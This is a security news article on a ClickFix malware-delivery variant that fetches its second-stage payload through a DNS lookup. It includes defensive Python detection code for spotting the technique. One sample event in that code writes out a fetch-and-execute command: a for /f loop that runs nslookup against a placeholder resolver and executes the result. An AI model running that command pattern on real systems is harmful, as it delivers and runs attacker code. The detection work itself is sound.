Microsoft has warned users that threat actors are leveraging a new variant of the ClickFix technique to deliver malware.
The ClickFix attack method has been increasingly used in the past year by both cybercriminals and state-sponsored threat groups.
The attack involves displaying a fake error message on a compromised or malicious site. The message instructs the target to fix the issue by pressing a specific key combination and then performing additional steps, such as pasting and running a command. By following the attacker's instructions, the user unknowingly grants elevated permissions, downloads malware, or executes attacker-supplied scripts.
In a recent ClickFix attack observed by Microsoft, the attacker asked targets to run a command that executes a custom DNS lookup.

“The initial command runs through cmd.exe and performs a DNS lookup against a hard-coded external DNS server, rather than the system’s default resolver. The output is filtered to extract the ‘Name:’ DNS response, which is executed as the second-stage payload,” Microsoft explained.
Because the second stage is retrieved through a DNS query rather than an HTTP download, the initial callback looks like an ordinary name resolution, which helps the attacker reach their infrastructure and confirm that the payload ran while blending malicious traffic into regular network traffic. Querying a hard-coded external resolver also sidesteps any filtering or logging performed by the organization's own DNS servers.
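The chain Microsoft describes leaves a distinctive footprint in process-creation telemetry: cmd.exe launching nslookup with an explicit resolver argument that is not one of the organization's DNS servers, the output being filtered for the "Name:" line, and a loop construct that executes whatever comes back. The following detection logic is an added example written for this article, not code from Microsoft or Huntress. The sample events, the corporate resolver allowlist, the hostname and the resolver address in the suspicious command line are all constructed placeholders modelled on the description above.

```python
import ipaddress
import re

# Constructed allowlist of corporate resolvers (assumption; replace with your own).
CORP_RESOLVERS = {ipaddress.ip_address("10.0.0.53"), ipaddress.ip_address("10.0.0.54")}
# Address space treated as internal when a resolver is not on the allowlist.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Constructed process-creation events (Sysmon event ID 1 style), not real telemetry.
# Event 1 is modelled on the article's description: cmd.exe, nslookup against a
# hard-coded resolver, output filtered for "Name:", result executed via for /f.
# The hostname and resolver address are placeholders.
SAMPLE_EVENTS = [
    {"id": 1, "parent": "explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmd": 'cmd.exe /c for /f "tokens=2" %a in (\'nslookup stage.example.test 203.0.113.7 ^| findstr Name:\') do %a'},
    {"id": 2, "parent": "powershell.exe", "image": r"C:\Windows\System32\nslookup.exe",
     "cmd": "nslookup intranet.corp.example 10.0.0.53"},
    {"id": 3, "parent": "cmd.exe", "image": r"C:\Windows\System32\nslookup.exe",
     "cmd": "nslookup www.example.com"},
    {"id": 4, "parent": "cmd.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd.exe /c nslookup www.example.com 8.8.8.8"},
]


def explicit_resolver(cmd):
    """Return the server argument of an nslookup call in cmd, or None.

    nslookup's non-interactive form is `nslookup [options] name [server]`, so a
    second positional argument is the hard-coded resolver the article describes.
    Parsing stops at a pipe or command separator so downstream commands are ignored.
    """
    m = re.search(r"nslookup(?:\.exe)?\s+(.*)", cmd, re.IGNORECASE)
    if not m:
        return None
    positional = []
    for tok in m.group(1).split():
        tok = tok.strip("'\"()")
        if tok.lstrip("^") == "|" or tok in ("&", "&&"):  # end of the nslookup command
            break
        if tok.startswith("-") or tok == "^":             # options / escape characters
            continue
        positional.append(tok)
    return positional[1] if len(positional) >= 2 else None


def classify_resolver(server):
    """'internal', 'external', or 'unknown' (hostname rather than an IP literal)."""
    try:
        ip = ipaddress.ip_address(server)
    except ValueError:
        return "unknown"
    if ip in CORP_RESOLVERS or any(ip in net for net in INTERNAL_NETS):
        return "internal"
    return "external"


def score_event(ev):
    """Score one process-creation event for the DNS-based ClickFix chain.

    'high'   : external resolver combined with output filtering or loop execution
    'medium' : external resolver alone (unusual on a managed endpoint)
    'low'    : only the filtering/execution pattern, no external resolver
    'none'   : nothing of interest
    """
    cmd = ev["cmd"]
    server = explicit_resolver(cmd)
    external = server is not None and classify_resolver(server) == "external"
    name_filter = bool(re.search(r"\bfind(?:str)?\b[^|&]*Name:", cmd, re.IGNORECASE))
    loop_exec = bool(re.search(r"\bfor\s+/f\b", cmd, re.IGNORECASE))

    findings = []
    if external:
        findings.append(f"nslookup against hard-coded external resolver {server}")
    if name_filter:
        findings.append("nslookup output filtered for the 'Name:' line")
    if loop_exec:
        findings.append("for /f loop executes command output")

    if external and (name_filter or loop_exec):
        severity = "high"
    elif external:
        severity = "medium"
    elif findings:
        severity = "low"
    else:
        severity = "none"
    return {"id": ev["id"], "severity": severity, "findings": findings}


def triage(events):
    """Return (id, severity) for every event that produced at least one finding."""
    results = (score_event(ev) for ev in events)
    return [(r["id"], r["severity"]) for r in results if r["severity"] != "none"]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(score_event(ev))
```

Tuning this for production means replacing the constructed allowlist with the resolvers your endpoints are actually configured to use and pairing it with DNS-layer telemetry: a client sending queries directly to an address that is not one of its configured resolvers is the network-side view of the same behaviour, and correlating the two cuts false positives from administrators who legitimately run `nslookup host 8.8.8.8` to troubleshoot.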
The second-stage payload downloads and executes a malicious Python script designed for reconnaissance. The final payload is then dropped and a persistence mechanism is deployed.
The final payload is a remote access trojan named ModeloRAT, which enables attackers to collect information about the compromised system and execute other payloads.
While Microsoft has not attributed the attacks to a specific threat actor, Huntress recently reported that a group tracked as KongTuke has been deploying ModeloRAT through a ClickFix variant dubbed CrashFix. That campaign was aimed at corporate environments.